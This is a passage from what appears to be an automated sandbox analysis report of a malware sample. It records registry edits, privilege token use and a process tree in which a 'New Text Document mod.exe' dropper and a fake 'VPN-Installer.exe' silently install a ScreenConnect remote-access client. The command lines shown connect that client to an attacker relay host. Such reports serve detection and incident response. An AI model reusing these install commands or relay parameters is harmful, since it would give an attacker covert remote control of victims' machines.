| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO.1\CLSID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM\DefaultIcon | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-e9736d81e38965d1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\066BF637963EA270D7C47FABD896ABE4\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\AppID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B}\ = "Interface {C9C2B807-7731-4F34-81B7-44FF7779522B}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\Application\AppUserModelId = "MSEdge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeMHT\shell\open | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.shtml | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.svg\OpenWithProgIds\MSEdgeHTM | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-0D32-6986436855F3}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgePDF\Application | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\shell\open\command\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --single-argument %1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\670477F90DC6EA60B24E65EDB2E83A5E\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}\1.0 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO.1 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\AppID = "{6d2b5079-2f0b-48dd-ab7f-97cec514d30b}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.html | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\594E83E3B144E17B918A56C8188C0B21\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\e9736d81e38965d1\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1A8704ED27DC1CF810A5B9C83F159194\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\594E83E3B144E17B918A56C8188C0B21 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\066BF637963EA270D7C47FABD896ABE4\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\e9736d81e38965d1\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e9736d81e38965d1\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (e9736d81e38965d1)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO\\ie_to_edge_bho_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\TypeLib\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1505343591-821288467-4101320450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask | C:\Windows\system32\taskmgr.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e9736d81e38965d1\shell\open | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\594E83E3B144E17B918A56C8188C0B21\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\594E83E3B144E17B918A56C8188C0B21\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\ApplicationName = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.xml\OpenWithProgids | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-0D32-6986436855F3} | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM\shell\open | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeMHT\shell | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\594E83E3B144E17B918A56C8188C0B21\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\e9736d81e38965d1\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\670477F90DC6EA60B24E65EDB2E83A5E\PackageCode = "670477F90DC6EA60B24E65EDB2E83A5E" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e9736d81e38965d1 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\VersionIndependentProgID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\DisplayName = "PDF Preview Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}\1.0\ = "TypeLib for Interface {C9C2B807-7731-4F34-81B7-44FF7779522B}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\TypeLib\ = "{2397ECFE-3237-400F-AE51-62B25B3F15B5}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}\1.0\0\win32\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\elevation_service.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\Programmable\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\DefaultIcon\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\msedge.exe,0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping [base64-encoded ping payload, truncated in source]
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe
"C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 744EA09B7BA7B5D76F054C87DCC8941F C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI85D9.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241272359 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding DA876DEF3671D31DDC65F679980BD4AA
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3B1B9C597AEA9010FCAF39907D2E9063 E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&t=FREE_VPN"
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "12337850-2b3d-4843-a4e9-32eb8a58f012" "User"
C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe
"C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 89B8F36B5097067F3BBED7A68D7C8476 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIE713.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241297203 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 5D41985BF1B96B1414A5AB28F558D6FC
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 00E078E3CA27A03288DE8EC44A19694A E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%